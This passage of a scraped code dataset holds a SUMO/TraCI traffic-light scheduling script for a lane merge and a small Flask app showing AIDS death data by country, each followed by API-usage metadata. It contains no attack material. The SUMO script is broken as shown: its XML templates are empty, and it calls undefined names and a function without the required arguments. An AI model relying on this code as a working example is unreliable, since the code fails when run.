"line_number": 23, "usage_type": "name"}, {"api_name": "flask.request.form.getlist", "line_number": 24, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 24, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 24, "usage_type": "name"}, {"api_name": "sqlReader.regesiterUser", "line_number": 31, "usage_type": "call"}, {"api_name": 
"flask.render_template", "line_number": 32, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 34, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 38, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 42, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 42, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 43, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 43, "usage_type": "name"}, {"api_name": "sqlReader.checkUser", "line_number": 44, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 45, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 46, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 48, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 53, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 53, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 54, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 54, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 55, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 55, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 56, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 56, "usage_type": "name"}, {"api_name": "flask.session.get", "line_number": 57, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 57, "usage_type": "name"}, {"api_name": "sqlReader.UserPurchase", "line_number": 59, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 60, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 62, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 66, "usage_type": "call"}, {"api_name": "flask.request.form.get", "line_number": 70, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 70, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 70, "usage_type": "name"}, {"api_name": "sqlReader.viewReview", "line_number": 71, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 74, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 76, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 80, "usage_type": "call"}, {"api_name": "flask.request.form.get", "line_number": 84, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 84, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 84, "usage_type": "name"}, {"api_name": "sqlReader.viewRating", "line_number": 86, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 88, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 93, "usage_type": "call"}, {"api_name": "flask.request.form.get", "line_number": 97, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 97, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 97, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 98, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 98, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 98, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 99, "usage_type": "call"}, {"api_name": "flask.request.form", 
"line_number": 99, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 99, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 100, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 100, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 100, "usage_type": "name"}, {"api_name": "sqlReader.showAllads", "line_number": 101, "usage_type": "call"}, {"api_name": "sqlReader.showAdsAvgPrice", "line_number": 102, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 103, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 107, "usage_type": "call"}, {"api_name": "flask.request.form.getlist", "line_number": 110, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 110, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 110, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 111, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 111, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 111, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 112, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 112, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 112, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 113, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 113, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 113, "usage_type": "name"}, {"api_name": "sqlReader.filterFeatures", "line_number": 114, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 115, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 119, "usage_type": "call"}, {"api_name": "flask.request.form.get", "line_number": 122, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 122, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 122, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 123, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 123, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 123, "usage_type": "name"}, {"api_name": "sqlReader.Top5Location", "line_number": 124, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 126, "usage_type": "call"}, {"api_name": "sqlReader.top5sellers", "line_number": 130, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 131, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 135, "usage_type": "call"}, {"api_name": "flask.request.form.get", "line_number": 139, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 139, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 139, "usage_type": "name"}, {"api_name": "sqlReader.SellerInventory", "line_number": 140, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 141, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 145, "usage_type": "call"}, {"api_name": "flask.request.form.get", "line_number": 149, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 149, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 149, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 150, 
"usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 150, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 150, "usage_type": "name"}, {"api_name": "sqlReader.top5amount", "line_number": 151, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 152, "usage_type": "call"}]}
+{"seq_id": "30712311795", "text": "#!/usr/bin/env python\n# old version of dp\nfrom __future__ import absolute_import\nfrom __future__ import print_function\nfrom http.client import NotConnected\n\nimport os\nimport sys\nimport optparse\nimport random\nfrom tkinter.messagebox import NO\nimport numpy as np\nfrom collections import namedtuple\n\nVehicle = namedtuple(\"Vehicle\", \"id time\")\n\n# we need to import python modules from the $SUMO_HOME/tools directory\nif 'SUMO_HOME' in os.environ:\n tools = os.path.join(os.environ['SUMO_HOME'], 'tools')\n sys.path.append(tools)\nelse:\n sys.exit(\"please declare environment variable 'SUMO_HOME'\")\n\nfrom sumolib import checkBinary\nimport traci\n\n\ndef generate_routefile(timeStep, N, pA, pB, pC):\n # random.seed(42) # make tests reproducible\n with open(\"./sumo_data/laneMerging.rou.xml\", \"w\") as routes:\n print(\"\"\"\n \n \n \n\n \n \n \n \"\"\", file=routes)\n num_A = 1\n num_B = 1\n num_C = 1\n t = 1.0\n while num_A <= N or num_B <= N or num_C <= N:\n if num_A <= N and random.uniform(0, 1) < pA:\n print(' ' % (\n num_A, t), file=routes)\n num_A += 1\n if num_B <= N and random.uniform(0, 1) < pB:\n print(' ' % (\n num_B, t), file=routes)\n num_B += 1\n if num_C <= N and random.uniform(0, 1) < pC:\n print(' ' % (\n num_C, t), file=routes)\n num_C += 1\n t += timeStep\n print(\" \", file=routes)\n\ndef compute_earliest_arrival(laneLength, schedule_A, schedule_BX, schedule_BY, schedule_C):\n a = [Vehicle('', 0)]\n b = [Vehicle('', 0)]\n c = [Vehicle('', 0)]\n currentTime = traci.simulation.getTime()\n\n # Vehicles in communication range on lane A\n for vehID in traci.lanearea.getLastStepVehicleIDs(\"dA\"):\n dist = laneLength - traci.vehicle.getDistance(vehID)\n speed = traci.vehicle.getSpeed(vehID)\n accel = traci.vehicle.getAcceleration(vehID)\n arrivalTime = 0\n if speed == 0:\n for i in schedule_A:\n if i.id == vehID:\n arrivalTime = i.time\n break\n else:\n if accel != 0:\n arrivalTime = currentTime + \\\n (((max(0, speed ** 2 + 2 * accel * dist)) ** 0.5 - speed) / accel)\n else:\n arrivalTime = currentTime + dist / speed\n for i in schedule_A:\n if i.id == vehID:\n if i.time < arrivalTime:\n arrivalTime = i.time\n break\n a.append(Vehicle(vehID, arrivalTime))\n\n # Vehicles in communication range on lane B\n for vehID in traci.lanearea.getLastStepVehicleIDs(\"dB\"):\n dist = laneLength - traci.vehicle.getDistance(vehID)\n speed = traci.vehicle.getSpeed(vehID)\n accel = traci.vehicle.getAcceleration(vehID)\n arrivalTime = 0\n if speed == 0:\n isFound = False\n for i in schedule_BX:\n if i.id == vehID:\n arrivalTime = i.time\n isFound = True\n break\n if not isFound:\n for i in schedule_BY:\n if i.id == vehID:\n arrivalTime = i.time\n break\n else:\n if accel != 0:\n arrivalTime = currentTime + \\\n (((max(0, speed ** 2 + 2 * accel * dist)) ** 0.5 - speed) / accel)\n else:\n arrivalTime = currentTime + dist / speed\n isFound = False\n for i in schedule_BX:\n if i.id == vehID:\n if i.time < arrivalTime:\n arrivalTime = i.time\n isFound = True\n break\n if not isFound:\n for i in schedule_BY:\n if i.id == vehID:\n if i.time < arrivalTime:\n arrivalTime = i.time\n break\n b.append(Vehicle(vehID, arrivalTime))\n\n # Vehicles in communication range on lane C\n for vehID in traci.lanearea.getLastStepVehicleIDs(\"dC\"):\n dist = laneLength - traci.vehicle.getDistance(vehID)\n speed = traci.vehicle.getSpeed(vehID)\n accel = traci.vehicle.getAcceleration(vehID)\n arrivalTime = 0\n if speed == 0:\n for i in schedule_C:\n if i.id == vehID:\n 
arrivalTime = i.time\n else:\n if accel != 0:\n arrivalTime = currentTime + \\\n (((max(0, speed ** 2 + 2 * accel * dist)) ** 0.5 - speed) / accel)\n else:\n arrivalTime = currentTime + dist / speed\n for i in schedule_C:\n if i.id == vehID:\n if i.time < arrivalTime:\n arrivalTime = i.time\n break\n c.append(Vehicle(vehID, arrivalTime))\n a[1:] = sorted(a[1:], key=lambda x: int(x.id.split('_')[1]))\n b[1:] = sorted(b[1:], key=lambda x: int(x.id.split('_')[1]))\n c[1:] = sorted(c[1:], key=lambda x: int(x.id.split('_')[1]))\n\n return a, b, c\n\n\ndef run(alpha, beta, gamma, W_same, W_diff):\n period = 20\n schedule_A = []\n schedule_BX = []\n schedule_BY = []\n schedule_C = []\n leaveA = False\n leaveBX = False\n leaveBY = False\n leaveC = False\n countdownX = 0\n countdownY = 0\n gA = False\n gBX = False\n gBY = False\n gC = False\n timeStep_cnt = 0\n passTime_dX = 0\n passTime_dY = 0\n A_IDs = []\n B_IDs = []\n C_IDs = []\n A_head = \"A_1\"\n B_head = \"B_1\"\n C_head = \"C_1\"\n\n \"\"\"execute the TraCI control loop\"\"\"\n while traci.simulation.getMinExpectedNumber() > 0: # The number of vehicles which are in the net plus the ones still waiting to start.\n # Disable lane changing\n for vehID in traci.simulation.getLoadedIDList():\n traci.vehicle.setLaneChangeMode(vehID, 0b000000000000)\n # Forward\n traci.simulationStep()\n timeStep_cnt += 1\n # Initially set all traffic lights to green\n traci.trafficlight.setPhase(\"TL1\", 1)\n\n leaveA = False # Whether a vehicle left from lane A at the last step\n leaveBX = False # Whether a vehicle left from lane B and go to lane X at the last step\n leaveBY = False # Whether a vehicle left from lane B and go to lane Y at the last step\n leaveC = False # Whether a vehicle left from lane C at the last step\n\n ''' Schedule '''\n if timeStep_cnt % period == 0: # Every period\n # If all the three lanes are not empty\n if traci.lanearea.getLastStepVehicleNumber(\"dA\") > 0 and traci.lanearea.getLastStepVehicleNumber(\"dB\") > 0 and traci.lanearea.getLastStepVehicleNumber(\"dC\") > 0:\n a, b, c = compute_earliest_arrival()\n schedule_A, schedule_BX, schedule_BY, schedule_C = schedule(\n a, b, c)\n # Sort the schedule by the entering time\n schedule_A.sort(key=lambda x: x[1])\n schedule_BX.sort(key=lambda x: x[1])\n schedule_BY.sort(key=lambda x: x[1])\n schedule_C.sort(key=lambda x: x[1])\n # Set the route for vehicles on lane B\n for veh in schedule_BX:\n try:\n traci.vehicle.setRouteID(veh.id, \"route_1\")\n except: # Too late to set the route\n # print('leaveBY', veh)\n # print(f'Remove {veh.id} from schedule_BX')\n schedule_BX.remove(veh)\n leaveBY = True\n for veh in schedule_BY:\n try:\n traci.vehicle.setRouteID(veh.id, \"route_2\")\n except:\n # print('leaveBX', veh)\n # print(f'Remove {veh.id} from schedule_BY')\n schedule_BY.remove(veh)\n leaveBX = True\n\n ''' Detect the passing vehicles '''\n # Get the ID list of the vehicles on each lane\n A_IDs = traci.edge.getLastStepVehicleIDs(\"A\")\n B_IDs = traci.edge.getLastStepVehicleIDs(\"B\")\n C_IDs = traci.edge.getLastStepVehicleIDs(\"C\")\n # Sort the list by the ID number\n A_IDs = sorted(A_IDs, key=lambda x: int(x.split('_')[1]))\n B_IDs = sorted(B_IDs, key=lambda x: int(x.split('_')[1]))\n C_IDs = sorted(C_IDs, key=lambda x: int(x.split('_')[1]))\n # A vehicle left from lane A at the last step\n if len(A_IDs) > 0 and A_IDs[0] != A_head:\n # print(A_head, \"leaves\")\n passTime_dX = traci.simulation.getTime() - 1 # Update the last passing time\n leaveA = True\n for s in schedule_A: # Remove 
it from the schedule\n if s.id == A_head:\n schedule_A.remove(s)\n break\n A_head = A_IDs[0] # Update the first vehicle on the lane\n elif len(A_IDs) == 0 and len(A_head) > 0:\n # The last vehicle left from lane A at the last step\n if int(A_head.split('_')[1]) == alpha:\n # print(A_head, \"leaves\")\n passTime_dX = traci.simulation.getTime() - 1\n leaveA = True\n for s in schedule_A:\n if s.id == A_head:\n schedule_A.remove(s)\n break\n A_head = \"\"\n if len(B_IDs) > 0 and B_IDs[0] != B_head:\n # print(B_head, \"leaves\")\n isFound = False # Find the vehicle is scheduled to lane X or lane Y\n for s in schedule_BX:\n if s.id == B_head:\n passTime_dX = traci.simulation.getTime()\n leaveBX = True\n schedule_BX.remove(s)\n isFound = True\n break\n if not isFound:\n for s in schedule_BY:\n if s.id == B_head:\n passTime_dY = traci.simulation.getTime()\n leaveBY = True\n schedule_BY.remove(s)\n break\n B_head = B_IDs[0]\n elif len(B_IDs) == 0 and len(B_head) > 0:\n if int(B_head.split('_')[1]) == beta:\n # print(B_head, \"leaves\")\n isFound = False\n for s in schedule_BX:\n if s.id == B_head:\n passTime_dX = traci.simulation.getTime()\n leaveBX = True\n schedule_BX.remove(s)\n isFound = True\n break\n if not isFound:\n for s in schedule_BY:\n if s.id == B_head:\n passTime_dY = traci.simulation.getTime()\n leaveBY = True\n schedule_BY.remove(s)\n break\n B_head = \"\"\n if len(C_IDs) > 0 and C_IDs[0] != C_head:\n # print(C_head, \"leaves\")\n passTime_dY = traci.simulation.getTime()\n leaveC = True\n for s in schedule_C:\n if s.id == C_head:\n schedule_C.remove(s)\n break\n C_head = C_IDs[0]\n elif len(C_IDs) == 0 and len(C_head) > 0:\n if int(C_head.split('_')[1]) == gamma:\n # print(C_head, \"leaves\")\n passTime_dY = traci.simulation.getTime()\n leaveC = True\n for s in schedule_C:\n if s.id == C_head:\n schedule_C.remove(s)\n break\n C_head = \"\"\n\n ''' Decide the phase of traffic lights '''\n # If there is at least one vehicle on an incoming lane\n if traci.lanearea.getLastStepVehicleNumber(\"dA\") > 0 or traci.lanearea.getLastStepVehicleNumber(\"dB\") > 0 or traci.lanearea.getLastStepVehicleNumber(\"dC\") > 0:\n gA = False # Whether to set the traffic light to green for lane A\n gBX = False # Whether to set the traffic light to green for lane B to lane X\n gBY = False # Whether to set the traffic light to green for lane B to lane Y\n gC = False # Whether to set the traffic light to green for lane C\n ''' Control outgoing lane X '''\n if len(schedule_A) > 0 and len(schedule_BX) > 0:\n # Let the vehicle on lane A go first\n if schedule_A[0].time < schedule_BX[0].time:\n if leaveA: # If a vehicle on lane A left at last step\n countdownX = W_same # Wait for W=\n elif leaveBX: # If a vehicle on lane B left at last step\n countdownX = W_diff # Wait for W+\n elif not countdownX: # If there is no need to wait or the waiting time is over\n gA = True # We can set the traffic light to green\n else: # Let the vehicle on lane B go first\n if leaveBX:\n countdownX = W_same\n elif leaveA:\n countdownX = W_diff\n elif not countdownX:\n gBX = True\n elif len(schedule_A) > 0:\n if leaveA:\n countdownX = W_same\n elif leaveBX:\n countdownX = W_diff\n elif not countdownX:\n gA = True\n elif len(schedule_BX) > 0:\n if leaveBX:\n countdownX = W_same\n elif leaveA:\n countdownX = W_diff\n elif not countdownX:\n gBX = True\n elif not countdownX:\n gA = True\n gBX = True\n\n ''' Control outgoing lane Y '''\n if len(schedule_C) > 0 and len(schedule_BY) > 0:\n if schedule_C[0].time < schedule_BY[0].time:\n if 
leaveC:\n countdownY = W_same\n elif leaveBY:\n countdownY = W_diff\n elif not countdownY:\n gC = True\n else:\n if leaveBY:\n countdownY = W_same\n elif leaveC:\n countdownY = W_diff\n elif not countdownY:\n gBY = True\n elif len(schedule_C) > 0:\n if leaveC:\n countdownY = W_same\n elif leaveBY:\n countdownY = W_diff\n elif not countdownY:\n gC = True\n elif len(schedule_BY) > 0:\n if leaveBY:\n countdownY = W_same\n elif leaveC:\n countdownY = W_diff\n elif not countdownY:\n gBY = True\n elif not countdownY:\n gC = True\n gBY = True\n\n # Set the traffic lights according to the boolean variables\n if gA and gBX and gBY and gC:\n traci.trafficlight.setPhase(\"TL1\", 0)\n elif gA and gBY:\n traci.trafficlight.setPhase(\"TL1\", 2)\n elif gA and gC:\n traci.trafficlight.setPhase(\"TL1\", 4)\n elif gBX and gC:\n traci.trafficlight.setPhase(\"TL1\", 6)\n elif gBX and gBY:\n traci.trafficlight.setPhase(\"TL1\", 20)\n elif gA:\n traci.trafficlight.setPhase(\"TL1\", 8)\n elif gBX:\n traci.trafficlight.setPhase(\"TL1\", 10)\n elif gBY:\n traci.trafficlight.setPhase(\"TL1\", 12)\n elif gC:\n traci.trafficlight.setPhase(\"TL1\", 14)\n else:\n traci.trafficlight.setPhase(\"TL1\", 1)\n # Subtract the waiting time\n if countdownX:\n countdownX -= 1\n if countdownY:\n countdownY -= 1\n\n # The last passing time\n if passTime_dX >= passTime_dY:\n print(passTime_dX)\n else:\n print(passTime_dY)\n\n traci.close()\n sys.stdout.flush()\n\n\ndef get_options():\n optParser = optparse.OptionParser()\n optParser.add_option(\"--nogui\", action=\"store_true\",\n default=False, help=\"run the commandline version of sumo\")\n options, args = optParser.parse_args()\n return options\n\n\ndef main():\n options = get_options()\n # this script has been called from the command line. It will start sumo as a\n # server, then connect and run\n if options.nogui:\n sumoBinary = checkBinary('sumo')\n else:\n sumoBinary = checkBinary('sumo-gui')\n\n # Randomly generate the traffics\n generate_routefile(timeStep, N, pA, pB, pC)\n\n # this is the normal way of using traci. 
sumo is started as a\n # subprocess and then the python script connects and runs\n traci.start([sumoBinary, \"-c\", \"sumo_data/laneMerging.sumocfg\",\n \"--tripinfo-output\", \"sumo_data/tripinfo_dp.xml\",\n \"-S\",\n \"--no-step-log\", \"true\", \"-W\", \"--duration-log.disable\", \"true\"])\n\n run(alpha, beta, gamma, W_same, W_diff)\n\n\nif __name__ == \"__main__\":\n main()\n", "repo_name": "JCP1014/Lane-Merging", "sub_path": "SUMO/example/runner_python.py", "file_name": "runner_python.py", "file_ext": "py", "file_size_in_byte": 18466, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "collections.namedtuple", "line_number": 15, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 18, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path", "line_number": 19, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 19, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 20, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 20, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 22, "usage_type": "call"}, {"api_name": "random.uniform", "line_number": 45, "usage_type": "call"}, {"api_name": "random.uniform", "line_number": 49, "usage_type": "call"}, {"api_name": "random.uniform", "line_number": 53, "usage_type": "call"}, {"api_name": "traci.simulation.getTime", "line_number": 64, "usage_type": "call"}, {"api_name": "traci.simulation", "line_number": 64, "usage_type": "attribute"}, {"api_name": "traci.lanearea.getLastStepVehicleIDs", "line_number": 67, "usage_type": "call"}, {"api_name": "traci.lanearea", "line_number": 67, "usage_type": "attribute"}, {"api_name": "traci.vehicle.getDistance", "line_number": 68, "usage_type": "call"}, {"api_name": "traci.vehicle", "line_number": 68, "usage_type": "attribute"}, {"api_name": "traci.vehicle.getSpeed", "line_number": 69, "usage_type": "call"}, {"api_name": "traci.vehicle", "line_number": 69, "usage_type": "attribute"}, {"api_name": "traci.vehicle.getAcceleration", "line_number": 70, "usage_type": "call"}, {"api_name": "traci.vehicle", "line_number": 70, "usage_type": "attribute"}, {"api_name": "traci.lanearea.getLastStepVehicleIDs", "line_number": 91, "usage_type": "call"}, {"api_name": "traci.lanearea", "line_number": 91, "usage_type": "attribute"}, {"api_name": "traci.vehicle.getDistance", "line_number": 92, "usage_type": "call"}, {"api_name": "traci.vehicle", "line_number": 92, "usage_type": "attribute"}, {"api_name": "traci.vehicle.getSpeed", "line_number": 93, "usage_type": "call"}, {"api_name": "traci.vehicle", "line_number": 93, "usage_type": "attribute"}, {"api_name": "traci.vehicle.getAcceleration", "line_number": 94, "usage_type": "call"}, {"api_name": "traci.vehicle", "line_number": 94, "usage_type": "attribute"}, {"api_name": "traci.lanearea.getLastStepVehicleIDs", "line_number": 130, "usage_type": "call"}, {"api_name": "traci.lanearea", "line_number": 130, "usage_type": "attribute"}, {"api_name": "traci.vehicle.getDistance", "line_number": 131, "usage_type": "call"}, {"api_name": "traci.vehicle", "line_number": 131, "usage_type": "attribute"}, {"api_name": "traci.vehicle.getSpeed", "line_number": 132, "usage_type": "call"}, {"api_name": "traci.vehicle", "line_number": 132, "usage_type": "attribute"}, {"api_name": "traci.vehicle.getAcceleration", "line_number": 133, "usage_type": "call"}, {"api_name": 
"traci.vehicle", "line_number": 133, "usage_type": "attribute"}, {"api_name": "traci.simulation.getMinExpectedNumber", "line_number": 185, "usage_type": "call"}, {"api_name": "traci.simulation", "line_number": 185, "usage_type": "attribute"}, {"api_name": "traci.simulation.getLoadedIDList", "line_number": 187, "usage_type": "call"}, {"api_name": "traci.simulation", "line_number": 187, "usage_type": "attribute"}, {"api_name": "traci.vehicle.setLaneChangeMode", "line_number": 188, "usage_type": "call"}, {"api_name": "traci.vehicle", "line_number": 188, "usage_type": "attribute"}, {"api_name": "traci.simulationStep", "line_number": 190, "usage_type": "call"}, {"api_name": "traci.trafficlight.setPhase", "line_number": 193, "usage_type": "call"}, {"api_name": "traci.trafficlight", "line_number": 193, "usage_type": "attribute"}, {"api_name": "traci.lanearea.getLastStepVehicleNumber", "line_number": 203, "usage_type": "call"}, {"api_name": "traci.lanearea", "line_number": 203, "usage_type": "attribute"}, {"api_name": "traci.vehicle.setRouteID", "line_number": 215, "usage_type": "call"}, {"api_name": "traci.vehicle", "line_number": 215, "usage_type": "attribute"}, {"api_name": "traci.vehicle.setRouteID", "line_number": 223, "usage_type": "call"}, {"api_name": "traci.vehicle", "line_number": 223, "usage_type": "attribute"}, {"api_name": "traci.edge.getLastStepVehicleIDs", "line_number": 232, "usage_type": "call"}, {"api_name": "traci.edge", "line_number": 232, "usage_type": "attribute"}, {"api_name": "traci.edge.getLastStepVehicleIDs", "line_number": 233, "usage_type": "call"}, {"api_name": "traci.edge", "line_number": 233, "usage_type": "attribute"}, {"api_name": "traci.edge.getLastStepVehicleIDs", "line_number": 234, "usage_type": "call"}, {"api_name": "traci.edge", "line_number": 234, "usage_type": "attribute"}, {"api_name": "traci.simulation.getTime", "line_number": 242, "usage_type": "call"}, {"api_name": "traci.simulation", "line_number": 242, "usage_type": "attribute"}, {"api_name": "traci.simulation.getTime", "line_number": 253, "usage_type": "call"}, {"api_name": "traci.simulation", "line_number": 253, "usage_type": "attribute"}, {"api_name": "traci.simulation.getTime", "line_number": 265, "usage_type": "call"}, {"api_name": "traci.simulation", "line_number": 265, "usage_type": "attribute"}, {"api_name": "traci.simulation.getTime", "line_number": 273, "usage_type": "call"}, {"api_name": "traci.simulation", "line_number": 273, "usage_type": "attribute"}, {"api_name": "traci.simulation.getTime", "line_number": 284, "usage_type": "call"}, {"api_name": "traci.simulation", "line_number": 284, "usage_type": "attribute"}, {"api_name": "traci.simulation.getTime", "line_number": 292, "usage_type": "call"}, {"api_name": "traci.simulation", "line_number": 292, "usage_type": "attribute"}, {"api_name": "traci.simulation.getTime", "line_number": 299, "usage_type": "call"}, {"api_name": "traci.simulation", "line_number": 299, "usage_type": "attribute"}, {"api_name": "traci.simulation.getTime", "line_number": 309, "usage_type": "call"}, {"api_name": "traci.simulation", "line_number": 309, "usage_type": "attribute"}, {"api_name": "traci.lanearea.getLastStepVehicleNumber", "line_number": 319, "usage_type": "call"}, {"api_name": "traci.lanearea", "line_number": 319, "usage_type": "attribute"}, {"api_name": "traci.trafficlight.setPhase", "line_number": 395, "usage_type": "call"}, {"api_name": "traci.trafficlight", "line_number": 395, "usage_type": "attribute"}, {"api_name": "traci.trafficlight.setPhase", 
"line_number": 397, "usage_type": "call"}, {"api_name": "traci.trafficlight", "line_number": 397, "usage_type": "attribute"}, {"api_name": "traci.trafficlight.setPhase", "line_number": 399, "usage_type": "call"}, {"api_name": "traci.trafficlight", "line_number": 399, "usage_type": "attribute"}, {"api_name": "traci.trafficlight.setPhase", "line_number": 401, "usage_type": "call"}, {"api_name": "traci.trafficlight", "line_number": 401, "usage_type": "attribute"}, {"api_name": "traci.trafficlight.setPhase", "line_number": 403, "usage_type": "call"}, {"api_name": "traci.trafficlight", "line_number": 403, "usage_type": "attribute"}, {"api_name": "traci.trafficlight.setPhase", "line_number": 405, "usage_type": "call"}, {"api_name": "traci.trafficlight", "line_number": 405, "usage_type": "attribute"}, {"api_name": "traci.trafficlight.setPhase", "line_number": 407, "usage_type": "call"}, {"api_name": "traci.trafficlight", "line_number": 407, "usage_type": "attribute"}, {"api_name": "traci.trafficlight.setPhase", "line_number": 409, "usage_type": "call"}, {"api_name": "traci.trafficlight", "line_number": 409, "usage_type": "attribute"}, {"api_name": "traci.trafficlight.setPhase", "line_number": 411, "usage_type": "call"}, {"api_name": "traci.trafficlight", "line_number": 411, "usage_type": "attribute"}, {"api_name": "traci.trafficlight.setPhase", "line_number": 413, "usage_type": "call"}, {"api_name": "traci.trafficlight", "line_number": 413, "usage_type": "attribute"}, {"api_name": "traci.close", "line_number": 426, "usage_type": "call"}, {"api_name": "sys.stdout.flush", "line_number": 427, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 427, "usage_type": "attribute"}, {"api_name": "optparse.OptionParser", "line_number": 431, "usage_type": "call"}, {"api_name": "sumolib.checkBinary", "line_number": 443, "usage_type": "call"}, {"api_name": "sumolib.checkBinary", "line_number": 445, "usage_type": "call"}, {"api_name": "traci.start", "line_number": 452, "usage_type": "call"}]}
+{"seq_id": "33686997099", "text": "from flask import Flask, request, Markup, render_template, flash, Markup\nimport os\nimport json \n\napp = Flask(__name__)\n\n@app.route('/')\ndef render_about():\n return render_template('about.html')\n\n@app.route('/databycountry')\ndef render_databycountry():\n return render_template('databycountry.html', options = get_country_options())\n \n@app.route('/data')\ndef render_data():\n country = request.args['country']\n return render_template('databycountrydisplay.html', options = get_country_options(), countryFact = fact_by_country(country))\n \n\ndef get_country_options():\n listOfCountries = []\n with open('aids.json') as demographics_data:\n years = json.load(demographics_data)\n for year in years:\n if not(year[\"Country\"] in listOfCountries):\n listOfCountries.append(year[\"Country\"])\n options = \"\"\n for c in listOfCountries:\n options = options + Markup(\"\" + c + \" \")\n return options \n\n\n\ndef fact_by_country(country):\n with open('aids.json') as demographics_data:\n years = json.load(demographics_data)\n highest = 0\n lowest = 15000\n \n highYear= 1990\n lowYear= 2015\n \n for x in years:\n if x[\"Country\"] == country:\n totaldeaths = x[\"Data\"][\"AIDS-Related Deaths\"][\"All Ages\"] \n if totaldeaths > highest:\n highest = totaldeaths\n highYear = x[\"Year\"]\n elif totaldeaths == 0:\n \t lowest = lowest\n if totaldeaths < lowest:\n lowest = totaldeaths\n lowYear = x[\"Year\"]\n highest = round(highest, 2)\n lowest = round(lowest, 2)\n\n return \"The year with the highest deaths in \" + country + \" is \" + str(highYear) + \" (\" + str(highest) + \")\" + \" and the year with the lowest deaths in \" + country + \" is \" + str(lowYear) + \" (\" + str(lowest) + \")\"\n\n\n\n\nif __name__==\"__main__\":\n app.run(debug=True)\n", "repo_name": "Lesly805/CORGIS-AIDS-DATA", "sub_path": "webapp.py", "file_name": "webapp.py", "file_ext": "py", "file_size_in_byte": 1950, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "flask.Flask", "line_number": 5, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 9, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 13, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 17, 